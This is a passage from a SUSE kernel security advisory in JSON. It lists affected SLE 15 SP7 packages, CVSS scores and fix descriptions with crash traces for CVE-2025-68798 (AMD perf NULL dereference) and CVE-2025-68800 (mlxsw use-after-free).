"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68797"
},
{
"cve": "CVE-2025-68798",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68798"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/amd: Check event before enable to avoid GPF\n\nOn AMD machines cpuc-\u003eevents[idx] can become NULL in a subtle race\ncondition with NMI-\u003ethrottle-\u003ex86_pmu_stop().\n\nCheck event for NULL in amd_pmu_enable_all() before enable to avoid a GPF.\nThis appears to be an AMD only issue.\n\nSyzkaller reported a GPF in amd_pmu_enable_all.\n\nINFO: NMI handler (perf_event_nmi_handler) took too long to run: 13.143\n msecs\nOops: general protection fault, probably for non-canonical address\n 0xdffffc0000000034: 0000 PREEMPT SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x00000000000001a0-0x00000000000001a7]\nCPU: 0 UID: 0 PID: 328415 Comm: repro_36674776 Not tainted 6.12.0-rc1-syzk\nRIP: 0010:x86_pmu_enable_event (arch/x86/events/perf_event.h:1195\n arch/x86/events/core.c:1430)\nRSP: 0018:ffff888118009d60 EFLAGS: 00010012\nRAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000\nRDX: 0000000000000034 RSI: 0000000000000000 RDI: 00000000000001a0\nRBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000002\nR13: ffff88811802a440 R14: ffff88811802a240 R15: ffff8881132d8601\nFS: 00007f097dfaa700(0000) GS:ffff888118000000(0000) GS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00000000200001c0 CR3: 0000000103d56000 CR4: 00000000000006f0\nCall Trace:\n \u003cIRQ\u003e\namd_pmu_enable_all (arch/x86/events/amd/core.c:760 (discriminator 2))\nx86_pmu_enable (arch/x86/events/core.c:1360)\nevent_sched_out (kernel/events/core.c:1191 kernel/events/core.c:1186\n kernel/events/core.c:2346)\n__perf_remove_from_context (kernel/events/core.c:2435)\nevent_function (kernel/events/core.c:259)\nremote_function (kernel/events/core.c:92 (discriminator 1)\n kernel/events/core.c:72 (discriminator 1))\n__flush_smp_call_function_queue (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207 ./include/trace/events/csd.h:64\n kernel/smp.c:135 kernel/smp.c:540)\n__sysvec_call_function_single (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207\n ./arch/x86/include/asm/trace/irq_vectors.h:99 arch/x86/kernel/smp.c:272)\nsysvec_call_function_single (arch/x86/kernel/smp.c:266 (discriminator 47)\n arch/x86/kernel/smp.c:266 (discriminator 47))\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68798",
"url": "https://www.suse.com/security/cve/CVE-2025-68798"
},
{
"category": "external",
"summary": "SUSE Bug 1256689 for CVE-2025-68798",
"url": "https://bugzilla.suse.com/1256689"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68798"
},
{
"cve": "CVE-2025-68800",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68800"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats\n\nCited commit added a dedicated mutex (instead of RTNL) to protect the\nmulticast route list, so that it will not change while the driver\nperiodically traverses it in order to update the kernel about multicast\nroute stats that were queried from the device.\n\nOne instance of list entry deletion (during route replace) was missed\nand it can result in a use-after-free [1].\n\nFix by acquiring the mutex before deleting the entry from the list and\nreleasing it afterwards.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\nRead of size 8 at addr ffff8881523c2fa8 by task kworker/2:5/22043\n\nCPU: 2 UID: 0 PID: 22043 Comm: kworker/2:5 Not tainted 6.18.0-rc1-custom-g1a3d6d7cd014 #1 PREEMPT(full)\nHardware name: Mellanox Technologies Ltd. MSN2010/SA002610, BIOS 5.6.5 08/24/2017\nWorkqueue: mlxsw_core mlxsw_sp_mr_stats_update [mlxsw_spectrum]\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xba/0x110\n print_report+0x174/0x4f5\n kasan_report+0xdf/0x110\n mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\nAllocated by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x8f/0xa0\n mlxsw_sp_mr_route_add+0xd8/0x4770 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n\nFreed by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x70\n __kasan_slab_free+0x43/0x70\n kfree+0x14e/0x700\n mlxsw_sp_mr_route_add+0x2dea/0x4770 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:444 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
